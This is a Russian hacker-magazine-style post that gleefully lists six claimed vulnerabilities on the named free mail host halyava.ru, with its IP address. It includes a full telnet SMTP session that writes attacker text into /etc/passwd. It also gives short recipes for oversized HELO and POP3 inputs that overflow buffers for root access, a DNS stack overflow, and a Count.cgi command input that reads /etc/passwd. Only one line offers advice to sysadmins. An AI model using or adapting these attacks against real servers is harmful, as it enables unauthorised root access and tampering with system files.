Спешу обрадовать пользователей
halyava.ru — сегодня обнаружено 6 дыр на этом freehome…)))
Как прекрасен этот мир, иногда хочется верить в
полную анонимность своих почтовых ящиков и
крутость, бессонными ночами созданных паг)… Ну
хватит лирики. Поговорим о деле.

Баг #1:

port smtp (tcp/25)
этот баг аналогичен багу, который был найден мной
на hotmail.ru (см. статью БАГ в HOTMAIL.RU).

Баг #2:

port smtp (tcp/25)
Сей баг дает право напрямую писать в файл на
удаленной UNIX машине. выглядит это примерно так:
[root@gwx3 mail]

# telnet www.halyava.ru 25
Trying 195.90.131.194…
Connected to www.halyava.ru.
Escape character is ‘^]’.
220 XYZZY ESMTP
helo broadcast.com
250 XYZZY
mail from : foo@go.net
250 ok
rcpt to :/etc/passwd
250 ok
data
354 go ahead
WELCOME TO HELL.NICE TIME FOR WEBKILLERS
.
250 ok 965026748 qp 17926
quit
221 XYZZY

Connection closed by foreign host.
Содержимое мессаги пишеться напрямую в
указанный в rcpt to файл))).

Баг #3

port smtp (tcp/25)
Ну это тоже типовой баг переполнение буфера smtp:
при коннекте на 25 порт и сообщении параметра HELO
свыше 10000 symb, sendmail тихо умирает или если запущен
remote shell (а он запущен) дает доступ с правами root.

Баг #4

port DNS (tcp/53)
Классика)) Срыв стека по 53 порту. Одно лишь
пожелание сис админам: Люди , не запускайте named от
рута)) или хотябы делайте апгрейд до bind 8.2.2-P3

Баг #5

port www (tcp/80)
Установлен Count.cgi (мало того, что установлен, так
еще и работает)
ЧТО МОЖНО СДЕЛАТЬ? ПОИМЕТЬ … с правами httpd )))
дайте ему на вход нечто типа : paramname=/bin/ls /etc/passwd ,
предварительно переполнив всякой дрянью буфер.

Баг #6

port pop3 (tcp/110)
При сообщении имени юзера свыше 10000 symb происходит
переполнение
буфера, результат — мертвый pop3 и free root exec на
удаленной UNIX
машине.

Вот и верь после этого людям………

Оставить мнение

Check Also

Как Apple обходит стандарты, заставляя тебя платить. Колонка Олега Афонина

Иногда сложные вещи начинаются с простых: планшет iPad Pro 10.5 вдруг перестал заряжаться …